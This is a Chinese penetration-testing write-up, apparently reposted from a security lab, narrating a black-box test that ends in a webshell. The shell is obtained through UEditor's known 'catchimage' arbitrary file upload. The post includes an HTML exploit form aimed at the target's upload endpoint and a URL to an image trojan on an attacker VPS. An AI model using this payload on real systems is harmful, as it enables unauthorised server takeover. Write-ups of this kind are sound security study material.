『渗透测试』无巧不成书

admin 2023年5月29日13:42:26评论41 views字数 1100阅读3分40秒阅读模式

点击蓝字 关注我们

『渗透测试』无巧不成书

日期:2023-05-26
作者:goout
介绍:分享一次幸运的渗透测试~

0x00 前言

给大家讲个故事吧~
故事就从[故事的开始]开始~
分享一次半真半假的渗透测试~

『渗透测试』无巧不成书

0x01 故事的开始

1.1 主角介绍

此次目标是一个登录窗口,无账号进行黑盒测试,测试范围为该业务系统:

『渗透测试』无巧不成书

1.2 新手村的攻击

(1)目录扫描

『渗透测试』无巧不成书

(2)登录爆破

『渗透测试』无巧不成书

(3)尝试注册

『渗透测试』无巧不成书

(4)信息收集

github、零零信安等多个平台收集该目标泄露信息无果。

『渗透测试』无巧不成书

(5)其他尝试

『渗透测试』无巧不成书

到此处,能用的方式基本都用完了,后面就是反反复复地查看系统的所有信息,重复抓包尝试绕过登录,绕过注册。

『渗透测试』无巧不成书

0x02 故事的发展

2.1 峰回路转

多次的过滤信息,发现数据包的 Cookie 中有自己忽略掉的信息,Cookie 中一个参数名字可能为某一个框架的名字:

『渗透测试』无巧不成书

github 搜索一下,看了几套源码,直到看到 Application.Web 这一套,感觉应该就是这个了:

『渗透测试』无巧不成书

『渗透测试』无巧不成书
『渗透测试』无巧不成书

发现系统使用 UEditor 编辑器,查看 UEditor 的版本:

『渗透测试』无巧不成书

拼接下路径,验证系统确实使用该套源码:

『渗透测试』无巧不成书

2.2 云开月明

查看 UEditor 的配置文件,根据网上公开的 UEditor 任意文件上传漏洞,找到文件上传接口:

『渗透测试』无巧不成书

『渗透测试』无巧不成书

新建html

<form action="http://xxxxxxxxxx/Utility/UEditor/net?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>

vps 放置图片马:

『渗透测试』无巧不成书

访问 html ,输入远程的图片马进行上传:

http://xx.xx.xx.xx:8088/a.png?.aspx

『渗透测试』无巧不成书


上传成功:

『渗透测试』无巧不成书

拼接路径,getshell

『渗透测试』无巧不成书

0x03 故事的结尾

这次测试确实幸运,能在较短时间内找到源码,权当趣事分享一下~

『渗透测试』无巧不成书

免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。

『渗透测试』无巧不成书

宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。

团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。


原文始发于微信公众号(宸极实验室):『渗透测试』无巧不成书

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月29日13:42:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   『渗透测试』无巧不成书https://cn-sec.com/archives/1764438.html

发表评论

匿名网友 填写信息